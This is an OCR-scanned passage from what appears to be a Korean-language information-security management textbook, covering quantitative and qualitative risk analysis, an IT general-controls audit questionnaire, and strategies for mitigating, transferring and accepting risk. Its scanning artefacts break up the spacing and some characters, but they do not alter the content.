다. 위 험 관리 를 자기 직 능의 하나로 진행하는 그롭에 는 보안(물리 적 보안，정 보체 계 보안) 
그룹，검열그룹，비상대책계획그룹 등이 있다. 

이 모든 분야들이 위험분석을 진행하기때문에 이 그룹들의 사업을 잘 조정하고 배합 
하는것 이 중요하다. 그러 자면 정보를 공유하여 방향과 사건대응을 교환해 야 한다. 

위 험분석 은 관찰，지 식，평 가 즉 예 리 한 안목과 재 치 그리 고 행 운의 과학이 다. 그러 
나 더 많이 알수록，더 열심 이 일할수록 성 공률은 더 크다. 

위험관리는 발견한 위험을 회사의 리익에 맞게 가장 좋은 방법으로 처리하는 기교 
이 다. 

위험을 수학공식으로 표현할수 있다. 

위 험 =위 협 X 취 약성 X 자산 

어 떤 공통적 인 실례 를 리용하여 이 공식 을 쉽 게 기 업 환경 에 적 용할수 있 다. 운동장 
에서 다른 아이에게 공부 끝나고 학교 정문밖에 나가서 때리겠다고 으르는 한 골목대장 
아이의 실례에서 매 구성부분을 다음과 같이 나눌수 있다. 

• 위협은 여기서는 매를 맞는것이므로 그 위협이 십중팔구는 일어 나리라고 본다. 
그 경우 다른 일이 일어 나지 않는한 그 골목대장이 위협한 후에 때릴 가능성은 
80%로 볼수 있다(대응책은 후에 설명). 

• 취 약성 은 다른 아이 의 약점 이 다. 이 아이 가 물리 적공격 으로부터 자신을 잘 방어 
할수 없다는 사실은 그 아이가 공격을 당하는 경우 100% 피해 볼것이라는것을 


344 



의미 한다. 

• 자산값은 계 산하기 쉽다. 새 샤쯔나 바지 값은 70딸라가량 된 다(싸우다가 코피 
터지고 옷이 분명 째지고 더러워질것이기때문이다). 

따라서 이 씨 나리오의 총 위 험은 : 

위험 =80% X 100%$70.00 
위험 =$56.00 

이 위험평가의 가치는 어디 있는가 하는 질문이 제기될수 있다. 이 평가를 리용하여 
해 당 대 책안들을 선 택 하고 그 근거 를 설 명하여 예 방적 인 행 동을 취 함수 있 을것 이 다. 대 
책안들로는 25딸라를 주고 경 호원(방화벽 )을 채 용하고 그날은 학교에 가지 않으며 (체 계 를 
닫고 기 업을 하지 않는것) 혹은 손해를 보상하기 위해 보험 에 드는것 등이 다. 이것들중 
처 음것은 약점 이 나 취 약성 을 강화하는것 이 라면 셋째것은 자산가치 를 보호하는것 이 다. 예 
방적 인 행동으로는 위험 을 제거하는 방법를, 례하면 그 골목대 장과 친하든가，육체훈련을 
하든가，격술을 배우든가 아니면 이 도시에서 떠나 다른곳으로 이사가는 등의 방법들이 
있을수 있다. 

따라서 이 실례로부터 출발하여 위험관리와 관련한 정의를 다음과 같이 쉽게 내릴수 
있 다. 

• 위험이란 영업에 영향을 주어 회사의 목적을 달성하지 못하게 하는 사건을 의미 
한다. 

• 위협이란 회사가 자기의 영업에 영향을 주는 사고를 낼수 있는 가능성을 의미한 
다. 일부 전문가들은 위협을 긍정적으로도 부정적으로도 묘사한다. 따라서 위협 
이 언제 나 부정 적영 향을 미 친 다고 보는것 은 확실 치 않다. 그러 나 흔히 그렇 게 
해석되군 한다. 

• 취 약점 이 란 위 협 이 교묘하게 리 용할수 있 는 약한 점 을 의 미 한다. 취 약점 은 하복 
부나 아킬레스건과 갈아 다른 부분에는 른든한 철갑을 씌 웠어도 공격 이 개시되 
면 전체 체계나 전체 망이 열려 짐으로써 위태로운 처지에 빠지게 될수 있다. 
그러나 위험을 일정하게 긍정적인 씨나리오로 될수 있다고 보면 《취약점》대신 
《 좋은 기회》혹은《 관문》이 라는 용어 를 써 야 한다. 이 런 씨 나리오에서 관건 
적문제는 제때에 그 좋은 기회를 포착하고 리용하여 위협이 최대의 리윤을 가져 
오게 해 야 한다. 

• 자산은 위험에 의하여 영향을 받는 요소이다. 우의 실례에서는 자산을 그 
개 인의 옷으로 보았다. 이것을 위험분석 에 대 한 대표적 인 정 량적해석 이 라고 
볼수 있다. 정량적위험분석에서는 위험을 순수 수학적인 관점으로 보고 매 
위험에 수값들을 주며 앞으로의 위험관리결정을 규제하는 지침으로 사용하 
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려 한다. 


정량적우 I 험분석 

정량적위험분석은 여러가지 좋은 점이 있다. 정량적위험분석은 다소 직선적인 결과 
를 제공함으로써 계산에 기초한 보고서를 상급리사들에게 제출할수 있게 한다. 또한 상 
당히 간단하므로 쉽게 표본형식으로 분석을 할수 있다. 해당 부문의 전체 전문가들의 지 
원과 조언 그리고 보조연구사업의 도움을 받으면 초기경험이 매우 적어도 정량분석이라 
는 품이 많이 드는 일을 해나갈수 있을것이다. 위험분석수행의 일부 단계들은 후에 취급 
하도록 한다. 

그러나 정 량적위험분석의 약점들도 쉽게 찾아낼수 있다. 이 분석방법은 예산적측면 
이나 재정검사적측면에서도 일정한 의의가 있지만 사고의 영향을 받는 많은 다른 요소들 
은 다 무시한다. 우의 실례에서 그 골목대장에 의하여 입을수 있는 피해정도를 어떻게 
알수 있단말인가. 대체로 외부적인 피해(옷，긁히거나 멍드는것，코피나오는것 등)만 예견 
하였지만 있을수 있는 피해는 훨씬 그이상으로 될수도 있다. 기업씨나리오를 실례로 보 
면 어떤 콤퓨터체계가 손상을 입겠는데 그 손실이 어느 정도로 되겠는지 누가 어떻게 알 
수 있단말인가. 콤퓨터범죄상습범이 체계에 뚫고 들어 와 어떤 범죄행위를 저지르러고 
마음만 먹었다면 공격의 범위와 피해기간에 제한이 있겠는가. 무엇이 도난 혹은 복사되 
였는지，어떤 트로이목마나 론리폭탄 혹은 비루스를 주입하였는지，어느 비밀정보가 로출 
되였는지 또한 오늘과 같은 경쟁시대에 어느 비공개고객의 세부나 자료가 빠져나갔는지， 
이 모든 요소들이 미지의것이므로 자산에 대한 피해액을 그 어떤 믿을만한 수자로 표시 
한다는것은 거의 불가능하다. 

이 장은 최근에 출판된 거의 모든 책들과 마찬가지로 위험에 대하여 부정적인 관점 
으로 보고 있다. 반대로 위험을 긍정적인것으로 보아도 좋은 기회를 성과적으로 활용하 
여 리익이 얼마나 되겠는가를 알수가 없다. 래일에 대응하지 않고 오늘에 대응한다거나 
혹은 기회를 다 놓쳐 자산(회사)이 지도적인 지위를 잃고 시장진출이 좌절된다면 자산에 
미치는 영향은 얼마나 크겠는가. 전형적인 실례로는 아마 주권시장을 들수 있을것이다. 
그 어떤 사람이나 회사가 리상적 인 행동시간(위험을 억제하는 시간)을 안다면 상당히 좋 
은것이다. 그러나 하루나 한시간 있으면 결과는 파국적이다. 

정량적위험분석에서 평가하기 힘든 일부 요소들로서는 종업원，주주나 소유자，고객， 
관리기관，공급자，신용평가기관들에 미치는 영향들이다. 

종업원의 견지에서 보면 공격이 성공하여 초래된 피해는 심각하나 알수 없다. 공 
격이 종업원들의 사기저락을 노렸다면 공격으로 하여 영문모르게 생산능률이 감소되 
며 기능공 및 숙련공보유문제가 제기되며 고객들에 대한 불성실한 반응，로동행정에 
서의 기능저하나 충돌 등이 유발될수 있다. 또한 이것으로 하여 새 기능공모집이 억 
제될수 있다. 
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회사가 주주들이나 소유자들의 기대에 맞게 사업을 진행해 나가지 못하면 주주나 소 
유자들을 자기 들이 투자한데 대 하여 인 차 후회 하거 나 흥미 를 잃 을수 있 다. 사고들이 련 
이 어 일어 나 회사가 자기 생산목표를 수행 하지 못하면 투자나 리윤을 다른 회사에 돌리 
는것을 막을수 없게 된다. 아무리 리유를 말하고 설명한다 하여도 이렇게 자본이 이동하 
면 그 회사의 금융적지위는 크게 영향을 받게 된다. 

고객들은 무슨 일에서나 성공을 가져 오는데서 관건적요인으로 된다. 가장 좋은 제 
품，가장 좋은 판매계획도 지어는 가장 훌륭한 종업원들이 있어도 고객들을 끌어 고객을 
많이 보유하지 못하면 다 쓸데 없다. 흔히 회사의 위력은 우수한 제품에 달려있다고들 
한다. 그러나 그 회사가 제공하는 제품이나 봉사에 누구도 관심이 없으면 무슨 소용이 
있겠는가. 우수한 제품을 가지고 있으면서도 신용문제로《나쁘게 보도된》일이 있는 회 
사보다는 렬등한 제품을 가진 회사가 더 일이 잘 되는 경우도 있다. 부기계산체계가 불 
안전하여 회사가 망한다면 필생품질담보가 소용없게 된다. 

기업을 감독하고 규칙을 지키게 하는 관리기관들은 대체로 사회적압력과 정치적영향 
력에 대하여 매우 약하다. 어떤 회사가 불안전하거나 취약성 있는 영업과정으로 하여 평 
판이 나쁘게 되 였다면 사회적 압력 에 못이겨 정 치 인들과 관리기관들은《자동적》인 반사 
작용을 일으켜 실지 그 회사에 《수갑을 채우게》되며 회사는 새로운 통제사항，절차， 
보고서，소송 등에 불필요한 자금을 지출하지 않으면 안되게 된다. 

심각한 사고와 재난을 겪은 회사들이 찾은 가장 큰 교훈들중의 하나는 모든 중요 고 
객들과 공급자들과 련계를 신속히 맺어 그들에게 회사가 아직 존속능력이 있으며 영업공 
정이 현재 계속되고 있다는것을 재삼 확인해 주는것이다. 이것은 이러한 그롭들속에서 
신뢰를 유지하는데서 필수적 이다. 회사가 심각한 사고를 일으켰다면 공급자가 새로운 원 
료와 지원，신용을 제공하기 꺼 려하는 경우에는 그 회사는 절름발이로 되여 시장진출능 
력을 재건하기 힘들게 될것 이다. 

이 모든 그룹들에 이 사고가 영향을 줄수 있는것으로 하여 또 이 요인에 수값을 적 
용하여 계산하기 어려운것으로 하여 많은 전문가들은 순수 정량적위험분석은 가능성과 
실천성이 부족하다고 주장하여 왔다. 

정성적우 I 험분석 

정량적위험 분석의 대안으로 되는것이 정성 적 위험 분석이다. 정성 적 위험 분석은 씨나리 
오에 기초하여 위험을 평가하여 해당 사건이 미칠수 있는 영향을 재는 공정이라고 볼수 
있 다. 

정성적위험분석에 대하여 말한다면 있을수 있는 사고들에 대하여 개괄적으로 쓴 
간단한 씨나리오들은 수없이 많으며 이 씨나리오들을 발전시켜 연구하면 이 런 씨나리 
오가 발생하는 경우 회사의 어느 분야가 영향을 받으며 이 분야가 받는 손해의 범위 
는 어느 정도인가를 잘 알수 있게 된다. 이것은 해당 전문가들의 최상의 예측에 달려 
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있 다. 

정량분석에서 진행한것처럼 위험을 수값으로 해석하는것이 아니라 피해분야에 대한 
위험수준을 측정하는 기준이 있다. 위험분식림은 어떤 형태의 사고들이 일어 날수 있겠 
는가를 회사의 운영환경에 대한 최고의 지식에 기초하여 결정해야 할것이다. 이것은 전 
략계 획 작성 그룹이 지 역 별 시 장전 략에 따라 진행 하는 금융모형 화와 류사하다. 씨 나리 오를 
개시하고 사건에 영향을 주는 변수들을 입력하는 방법으로 위험림은 사건이 영향을 미 
치는 매 분야들을 찾아 내고《큰 영향》，《보통 영향》，《작은 영향》과 갈은 단순그 
라프 혹은 상징 적 표식 인 3, 2, 1，0에 기 초하여 그 그룹에 대 한 영 향을 결 정할수도 있 
을것 이 다. 모든 영 향받는 분야들을 찾아 내 면 매 분야의 값들이 집 계 되 여 해 당씨 나리오 
가 발생한 회사에 미치는 총적 인 영향이 나 위험 을 예측할수 있다. 순수한 재정적고려를 
내 놓고 라도 분석 에 서 고려 되 여 야 할 분야들은 생 산능률, 생 산의 욕，신용도，사회 적압력， 
앞으로의 전략적창의 력 에 미칠수 있는 영 향이 다. 

정 보체 계 에 대 한 위 험분석 을 진행할 때 마다 중요하게 고려해 야 할것 은 AIC 3요소 
(리용성，무결 성，비 밀 성 이 라는 정 보기 술의 3대 목표-역 주)를 반드시 지키 는것 이 다. 위 험 
분석은 체계의 리용성이라는 요구조건을 반드시 고려해야 한다. 체계가 끊임없이 가동 
하는것 이 기 본인가 아니 면 보수를 위해 중단시 키 겠는가 아니 면 영 업 과정 에 심 각한 장 
애를 줌이 없이 체계고장으로 하여 간단히 가동중지시키겠는가. 체계와 관련된 자료와 
공정조종，접 근조종 그리 고 그 기 초를 이 루는 기 초방책들의 무결성 도 철저 히 검 토해보 
아야 한다. 

아마 지난시 기 비 밀 루설 로 자료로출위 험 이라는 분야만큼 부정 적 인 영 상을 많이 받은 
분야는 없을것이다. 고객의 사적정보가 크게 요란히 침해되면 그것은 많은 회사들에 있 
어서 치명적인 사고라고 할만도 하다. 

AIC 3요소와 위 험분석 사이 의 관계 를 잘 조사해 낼수 있는 가장 좋은 방법 의 하나는 
콤퓨터전반통제검 열을 모든 정 보체 계 에 다 실시해 보는것 이 다. 콤퓨터전반통제검 열을 위 
한 설문서실례 를 표 22 — 1에 주었 다. 이것 은 인터네 트상에서 구입할수 있는 여 러 가지 류 
사한 문건들에서 편집된 간단한 조사서 이다. 이 조사(표 22-1 을 볼것)를 잘하면 숙련， 
고장점，하드웨 어 및 쏘프트웨어 지원，문건작성 등과 같은 분야의 약한 고리 들을 찾아낼 
수 있다. 이 모든것들은 그어떤 체계에 사고가 위험으로 실지 조성되였을 때 그 분석에 
서 매우 귀중하다. 

그러나 정성적위험분석은 정량적위험분석에서와 마찬가지로 자체의 약점을 가지고 
있다. 경영진에게는 이것이 너무 느슨하고 불명확하게 보이므로 대응책으로 되는것들을 
구입하거 나 새 로운 방책 과 통제 를 실시해 야 하겠다는 필요성 이 나 원가 대 리윤분석 을 해 
야 되 겠다는 결심 을 가지리 만큼 뚜렷 이 안겨오지 않을것 이 다. 

이러한 리유로 하여 지금 많은 회사들에서는 이 두가지 방법의 분석을 종합하여 실 
시 한다. 회사들에서는 씨 나리오계발식 정성적위험분석(그림 22-1 을 볼것)을 적용하여 사 
고의 영향을 받는 모든 부문들을 찾아내여 정량적위험분석을 적용하여 사고에 대한 일정 
한 추산에 따라 대 략적 인 딸라수치를 위험영 향 혹은 손실에 대 입한다. 
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목적 


표 22-1 


콤퓨 터의 일반틍제지침질문서 


검열자가 부서에 있는 쏘프트웨어도구와 콤퓨터체계 혹은 하드웨어에 대한 체계 및 공 
정분석을 할 때 우리는 검열자가 검열과정에 이 질문서에 내용을 기입할것을 촉구합니다. 

이것은 우리로 하여금 회사전반에서 현재사용중에 있는 체계들을 찾아 내고 더 잘 감시 
하게 할것이며 이 체계와 관련된 위험들분석평가하고 이 체계들을 앞으로의 검열계획에 
포함시킬수 있을것이다. 

협조해주어 갑사합니다. 모르시는 문제가 있으면 알란이나 저와 련계를 취해주십시오, 

체계이를과 략어 _ 

앞으로 련계가질 주요사람 _ 

체계사용분야_ 

초기면담에서 할 질문들: 

체계기능에 대해 우려에게 설명해주십시오:_ 

이 체계가 어떤 가동환경(하드웨어)에서 가동합니까?_ 

이 것 이 개 인 쏘프토웨 어 입 니 까? 아니_누가 공급자입 니 까?_ 

MTS (통보문전송체계)가 원천코드를 한부 가지고 있습니까? 예_아니_ 

어 느 부서 에 있습니 까?_ 

원천코드에는 누가 변경권한을 가지고 있습니까?_ 

파일예 비본뜨기 가 밖에서 계 획되 고 보관됩 니까 f 
체계사용자명단과 그들의 특권사항을 받아 

보려면 어떻게 해야 합니까?_ 

쏘프트웨어 와 하드웨 어 수리 보수를 위 한 계 약이 있습니 까? 

한부 사본을 엄을수 있습니까? 

임무분담관계 

같은 사람이 보안과 프로그람작성을 같이 하거나 
자료입력도 할수 있습니까? 

입력/처리/출력의 무결성과 정확성 

모든 입 력 자료가 정 확히 들어가서 처 리 되 였는가를 확인하는 
입 력 자료편집 검 열과 총체 적통제 방법 이 있습니 까? 

누가 사업과정을 감시하며 사업태만을 밝혀 냄 니까?_ 

누가 출력/보고자료사본을 받아 볼니까?_ 


예_아니. 


예_아니¬ 
에_아니. 


예_아니_ 


예_아니. 


권한관계 

누가 체계에 대한 높은 급의 접근권한을 가지고 있습니까?_ 


보안 一 물리적보안과 설정 
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하드웨 어 와 자료입 력 말단장치 들은 안전합니 까? 
누구나 거기에 접근할수 있습니까? 특히 높은급 
워 크스테 이 션같은데 말입 니 다. 

각종 표의 보유 

체계와 관련한 그 어떤 표가 있습니까? 

(실례로 세금표，사원식 별표 m 

누가 이 표를 수정할수 있습니까?_ 


전체 체 계 와 과정 이 문서 화됩 니 까? 

이 문건들은 어느 곳에 보관됩니까?_ 

말단사용자 숙련 

누가 사용자들을 훈련시 립니까?_ 

누가 체계관리 자들을 훈련시 킵니까?_ 

지식 있는 예비대리자가 있습니까?_ 

체계의 재해수복계획 

이 체계의 재해수복계획을 준비하여 회사비상관리 
철 해 두었습니까? 










물론 이것은 영업공정과 있을수 있는 위험에 대한 높은 수준의 료해와 지식을 전제 
조건으로 하고 있다. 


관건적문제 


위 험분석 에서 3가지 관건적 요소라고 한다면 그것은 다름아닌 지 식，관찰，기 업 가적안 
목일 것이다. 

지식 

위험분석을 잘하려면 회사운영환경에 대한 철저하면서도 현실적 인 료해가 필요하다. 
위험관리자는 회사가 직면한 있을수 있는 위험요소들과 취약점들을 다 잘 알아야 한다. 
새로운 위협형태，경향성，체계요소，도구, 구조들에 대한 최신자료들을 다 알고 있어야 
취 약성들중에 서 과장된것 들과 지 역적 인것들을 갈라내 고 자기기관에 적절한 대 응책들을 
강구할수 있다. 영업분야의 협조를 요청하여 위험분석을 진행하고 거기에서 얻어지는 
믿음직한 권고안들을 경 영 진에 제 출하기 위 해서는 위 험 관리 자가 가능한 위 협 들과 대 안들 
에 대한 현실적인 씨나리오를 제출할수 있어야 한다. 이러한 지식은 보안불레찐，무역관 
계잡지，검 열 기 록들을 끊임 없 이 검 토해 보는데 서 엄 어 지 는것 이 다. 이 렇 기 때 문에 위 험 총 
괄책 임 자도 역 시 고위경 영 진에 자리잡은 직 무이 므로 회 사의 전략적방향을 알고 있으며 
중요발기권을 가지 게 되는것 이 다. 위험총괄책 임 자는 또한 회사에 영향을 줄수 있는 일체 
사고정형을 수시 로 보고받아야 한다. 

관찰 

관찰은 두번째 관건적인 요소이다. 우리는 자료범람과 통신범람의 시대에 살고 있다. 
관찰이 란 모든 외 부의 영 향들을 통찰하며 그 밑 에 깔려 있는 씨 나리오들을 리해할수 있 
는 능력과 기교를 말한다. 관찰에서는 모든 도구들과 보고서들을 수시로 검토하고 그 어 
떤 비정상적 인 조건들이 있지 않는가를 알아 보아야 한다. 지적해 야 할것은 많은 유용한 
검사기록파일들 그리고 도구들이 제공하는 출력보고서들이 시간이 없고 힘들다는 구실로 
한번도 들여 다 보지 않은채로 그냥 책장에 놓여 있다는것 이 다. 자기집 콤퓨터에 침입람 
지체계 ( IDS ) 를 하나 설치한 후 처음으로 들여다 보면 자기 콤퓨터가 얼마나 많은 스캔을 
당하고 공격을 받았는지 알고는 깜짝 놀랄것 이 다. IDS 를 설치 하니 스캔과 공격 이 시 작되 
였는가，그렇 지 않다. 정 확한 도구를 구매하였 으니 그 공격 들을 관찰할수 있 었 던것 이 다. 

따라서 관찰과 도구의 사용은 그 동작환경의 특성과 위험을 료해하는데서 필수적 이 다. 

기업가적안목 

위 험 분석 의 기 본리 유는 결과를 얻 자는것 이 다. 그러 므로 세 번째 관건요소는 기 업 가적 
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안목 즉 기업계에서 효과적으로 운영을 해나가는 능력, 방법과 기법을 감수하고 리해하 
고 사용하여 소여목적을 달성하는 상업가적재능이라고 할수 있다. 기업가적 안목은 보통 
기업가와 능력있는 기업가를 가르는 척도이다. 기업가적재능이 있으면 일을 어떻게 솜씨 
있게 해내야 하는가，설득력 있으며 신뢰성 있는 의견제시는 어떻게 해야 하는가，《승냥 
이 온다》하고 소리치는식의 경고를 어느 때에 하고 언제 제끽 빠져야 하는지를 잘 안다. 
위험분석의 기초는 기업의 사명에 대한 리해와 달성이므로 위험관리자는 자기들의 전통 
적인 편견은 제쳐놓아야 하며 영업분야의 책임자들이 위험과 그 대응책을 분석할 때 그 
들의 립 장에 서서 모든것을 리 해 할수 있는 능력을 반드시 가져 야 한다. 

위험관리대책안이 리상적으로 되자면 사용자，영업분야책임자들과 능력 있는 행정일 
군들의 지원을 받아야 한다. 이것은 대책안이 사용자들에게 지나치게 간섭적이거나 시끄 
러운것으로 되지 말아야 하며 지원을 주는 영업체계나 영업공정에 생산능률이나 작업수 
행상 큰 영 향을 주지 말아야 한다는것을 의미 한다. 


위 험 관 리 


이제부터는 위험관리라는 과학이 효력을 나타내야 한다. 위험관리란 있을수 있는 사 
고들을 방지，람지，수정하기 위하여 영업공정들과 체계에 통제를 실시하는것과 위험관리 
대책안이 기업의 정상흐름과 시간에 방해를 주지 않도록 하는 요구사항과의 적절한 균형 
을 말한다. 

위험평가 및 분석이 완결되였으므로 그 결과는 회사에 주는 가능한 모든 위험들을 
간단명료하게 개괄한것이여야 한다. 이 개괄보고서에는 발견된 모든 위협요소들，매 위협 
요소들에 의하여 영향을 받을수 있는 부문，로출(실행되는 위협요소)에 의한 피해액，매 
영 업그롭에서 주요역 할을 수행하는 사람 등이 목록으로 반영되여 야 한다. 

이 평가보고서를 보고 위험관리담당자는 해당 위험이 일정한 형태의 대응책을 취하 
는것을 필요로 하고 있는가를 평가해야 하는것이다. 흔히 이 대응책들은 세가지 부류 즉 
약화，할당，접수로 나누어 질수 있다. 

약화 

위험을 약화시키기 위해서는 대체로 일정한 새로운 조종수단이 도입되여야 한다. 이 
조종수단들로는 관리적(균형조절，개인식별조종，공정변화 혹은 물리적접근 규칙)，기술적 
(침입탐지체계，방화벽，구조구성，새로운 도구도입)수단들이 있다. 

위 험 범위 와 기 업운영 요구사항들을 정 확히 감정 하고 평 가하기 위 하여 위 험 관리 자는 
위험들에 대한 가능한 대안들의 목록을 작성해야 할것이다. 이 대안들은 원가，효률，사 
용자리용의 견지에서 평가해 본 다음에 비준에 제기하여 실행시켜야 한다. 

위험분석과 위험관리공정 이 이쯤 이르고 보면 초기위험분석공정에서 느끼던 공포와 
흥분은 점차 가라앉거나 사그라 들기 시작한다. 사람#聲 새로운 문제들에 달라 불게 되 
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며 몇주일전까지만해도 밤을 패가며 일하지 않으면 안되던 그 위협에 점차 무디여 지게 
된 다. 

바로 이러한 시점들에서 많은 위험관리공정들이 랄선하기 시작한다. 대안들이 제기 
되고 지어 제품까지 들여 왔으나 그 실행의 추동력은 점점 맥이 빠져간다. 누구도 들여 
다 보고 그 특성을 모두 알려고 하지 않아 새로 들여 온 도구들도 도외시된채 놓여 있다. 
통제 가 약해지 고 무력 해 진다. 

예산지출이 되지 않아 통제에 대한 행정적지원이 계속되지 못한다. 이것은 보안관리 
자에게 있어 암흑의 나날로 될수 있다. 그 결과는 대개 불완전한 위험분석과 불완전한 
위험관리공정으로 된다. 자，이제 실행을 눈에 앞두고 그 계획은 조용히 사라져 간다. 

이것은 위험관리자들에게 있어서 난관이 아닐수 없다. 위험관리자는 그 기회에 일떠 
서서 의식화계획을 작성하고 새로운 통제의 중요성을 설명하며 모든 사람들에게 자기 부 
서와 자기 회사의 앞날의 건강에서 이 위험대 안이 얼마나 중요한 역할을 하는가에 대하 
여 알도록 하여 야 한다. 

오 I 탁 ( Outsourcing ) 

오늘날 많은 회사들이 찾고 있는 하나의 대안은 위험관리도구의 채용과 위험관리의 
할당사이의 결합수법 이 다. 이것은 위험관리 공정의 주요분야들에서 외부의 자원에 위 탁하 
는 개념이다. 정보체계의 보안을 위하여 일련의 도구와 제품들을 관리하는 유능하고 지 
식있는 일군들을 다 가지고 있다는것은 회사로서는 힘든 일이다. 따라서 여러 회사들에 
위 험 관리봉사를 24시 간 제 공하는 유능하고 기능 높은 인원들을 가지 고 있는 판매 업체 나 
제조업체의 전문기술을 써 먹는수밖에 없다. 이렇게 되면 수많은 자체전문가들을 계속 
전습을 주고 양성해 야 하는 회 사의 품을 덜 어 줄뿐아니 라 계 3자의 독자적 인 평 가와 권고 
를 통하여 일정한 정도의 갱 신조치 를 취 한다는것을 보여 줄수도 있다. 그러 나 이것은 상 
당히 어려운 문제이다. 약속한 봉사가 제때에 제공되지 않을수도 있으며 제3자에게 맡겨 
진 기 업망에 대 한 정보와 내용이 안전하고 비밀에 붙여 지 도록 회 사는 노력해 야 한다. 
여우를 데려다 닭장을 지키게 하는것보다 더 어리석은 일은 없을것이다. 외탁협정을 통 
하여 위험총괄책임자는 해당 지원회사사업의 성실성을 평가할수 있는 권한을 보유하도록 
하여 야 한다. 

할당 

위험을 할당한다는것은 위험의 일부를 다른 회사에 맡기거나 넘기는것을 말한다. 이 
것은 일종의 보험계약이나 봉사계약을 통하여 실현된다. 보험자들도 회사의 위험에 대하 
여 상당히 철저한 검 열을 요구하여 모든 위 험들이 다 통지되 였는가，옳바른 작업 과정 이 
실행되고 있는가를 확인해 본다. 이러한 보험도 구체적으로 평가하여 봄으로써 사고가 
발생하는 경우 보험 자의 보상이 어 느 정도의 제 한성 이 있는가를 리해하도록 하여 야 한다. 

가능한 일부 보험분야는 봉사거부，전자상업거래의 중절， Web 싸이트의 손상들에 대 
한 보험이다. 


353 




접수 

위험이 그리 큰 정도가 아니거나 대책안을 통하여 허용수준으로 약화되였을 경우 잠 
재적위험 에 대 한 접수가 필요하다. 

일정한 수준의 위험을 접수하기 위하여 경영진은 그 위험범위를 결정하기 위한 위험 
분석공정을 평가해 주어야 한다. 경영진에 이 결과자료가 제출되면 경영진은 위험접수에 
서명해야 한다. 이것은 위험이 약한 정도이므로 그 영향으로 인한 비용보다 대응책비용 
이 더 많이 든다는것 혹은 위험예방책이 현재 없으므로 할수없이 그 위험은 허용해 두지 
않으면 안된다는것을 의미 한다. 


요 약 

위험분석과 위험관리는 격동적으로 장성하는 분야이다. 한 회사가 위험을 찾아 내고 
사고나 로출을 미리 막을수 있는 능력을 가지고 있다는것은 끊임없이 증가되는 위험요소 
들과 곤난속에서도 기업의 지속적인 존속과 성장을 담보하는 하나의 중요한 리익이다. 
기업의 요구에 맞게 자기들의 노력을 조정하며 새로운 사태발전과 새로운 기술에 발맞추 
어 나가는 능력을 가지고 있다면 그것은 곧 뛰여난 위험관리자와 세속적이며 무능한 위 
험관리 자를 가르는 척도로 된다. 

위험관리와 위험분석에 대한 보다 깊은 연구를 하려면 주소 http :/ AVWW . iatf.net 의 
Information Assurance Technical Framework ( IATF : 정 보보증기술체 계)를 참고하기 를 바 
란다. 
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제 2 3 장. 정보위험관리의 새로운 추세 


브레트 레간 

최근년간 회사들이 정보보안에 대한 투자를 늘이고 있는것은 이전과는 달리 기간업 
무체계들이 점점 더 큰 위협을 받게 되는것과 관련되여 있다. 전자자료교환 ( EDI ) 체계，전 
자자금전달 ( EFT ) 체 계 , 원격접 근，판매 의 자동화와 같은 새 로운 기 술을 받아 들임 으로 하 
여 기밀자료들이 있는 곳들이 점점 더 큰 위협을 받게 되였다. 인터네트를 리용하는 현 
상은 최근의 현상으로서 위험을 가장 많이 받는 분야로 되고 있다. 그러나 앞을 내다 보 
는 회 사들은 인터네 트상에서 위 협 요소들의 급속한 증가에 아랑곳하지 않고 맞받아 나아 
가 경쟁력을 높이는데 매진하고 있다. 

정 보위 험 관리 는 새 로운 분야로서 일 반적 인 전자정 보체 계 를 뒤따르고 있 다. 오늘까지 
대 부분의 기 관들에 서 정 보위 험 관리 는 주로 《 풋내 기》적 방법 으로 진행 되 여 왔다. 대 개 
전문가들의 의견을 받아 현안보호의 필요성에 대한 도움이나 받았지 앞으로 생길 위협들 
은 어찌할 생각도 못하는 실정 이 다. 전자적 인 요새 화사업도 기 관들이 방어 태세를 개선하 
는데 목적이 있었다. 이러한 대책들은 기업들로 하여금 통제와 위협이라는 정교한 균형 
을 가지 고 기 업 운영 을 하게 하면서 도 지 금까지 보면 일 정하게 나마 성 과를 거 두었 다. 그 
렇다고 하여 그 기 관들이 를퓨터범죄의 타격을 받지 않았다고 말하는것은 아니 다. 이 러 
한 범죄들이 그 규모와 회수에 있어서 상당이 낮은 수준에 있었으므로 정보보안부서들과 
보안림들이 정보위험관리를 충분히 잘하고 있는듯한 인상을 주었을런지도 모른다. 

전통적수법 


기성위험분석은 하나의 잘 정립된 학문으로서 기업들의 결심채택에 도움을 준다. 위험 
분석 은 무질서한 우연적 인 사건들을 정돈하는데 가장 많이 리 용된다. 발생 가능성빈도률이 
굉 장히 높은 어떤 사건의 빈도수를 관찰하면 그 무엇 이 언제 어떤 정도로 발생하겠는가를 
일정한 정확도로 추측해 낼수 있다. 이렇게 하면 앞으로 100년동안에 7급의 지진이 10번이 
나 요꼬하마시에 일어 날것 이라는것도 예측할수 있다. 매 사건발생의 예상비용에 대한 정 
보만 있으면 년간예 상손실 액 ( ALE ) 을 확정할수 있다. 기성위 험 분석은 위 험분석 및 관리를 
위한 강력한 수단으로 되지만 사람，교통상태와 같은 정적 이거 나 속도가 매우 느린 체계 나 
지 층현상을 분석할 때 에는 그 효과가 최 고에 달한다. 콤퓨터 기능상실을 가져 오는 사고 같 
은것들은 도표화하기도 힘들거니와 예측하기는 더욱 힘들다. 그 두가지 리유는 ; 

1. 콤퓨터와 관련된 최근추세의 변화가 너무 빠르므로 그 어떤 지적 인 예 측을 위해 
리 력자료를 충분히 수집한다는것 은 곤난하다. 이 에 대 한 좋은 실례 는 정 전으로 인 
하여 체계의 가동이 중지된데서 볼수 있다. 캘리포니아의 한 관찰자는 어느 한 봉 
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사기관리업체 가 10년내 에 3시 간짜리 정전상태 가 1회 이상 있을것으로 추측하였다. 
1996년에 그 추측이 그럴듯 하였다. 그로부터 5년도 안되여 전력위기가 계속된 후 
그 예상회수는 10배로 늘어 났다. 

2. 콤퓨터범죄에는 호상작용하는 특성 이 있다. 범죄 자들은 어느 한 기 업에서 보호상 
태 가 가장 약한곳을 타격하려 고 한다. 정 보보안림 의 대 응으로 하여 한번 공격받은 
곳은 인차 보강되군 한다. 공격자들과 공격받는 사람들사이의 이 러한 관계로 하여 
예측시도가 상당히 랄선되는 경우가 많다. 

정보위험 이 기 타 기 업위험과 같은점들이 많지만 정보위험도 독특한것 이므로 기성방 
법 으로 분석 하고 문제를 해결하는것은 상당히 어 려운 문제 이 다. 

최선들 다하여 


전 자상업 거 래 활동을 보호하기 위 하여 대 부분 기 업 들은 방화벽 과 인증체 계 와 갈은 요 
소들에 초점 을 두면서 처 음부터 《 피 하기》전 략에 매 달렸 다. 인 터네 트의 교묘한 리용에 
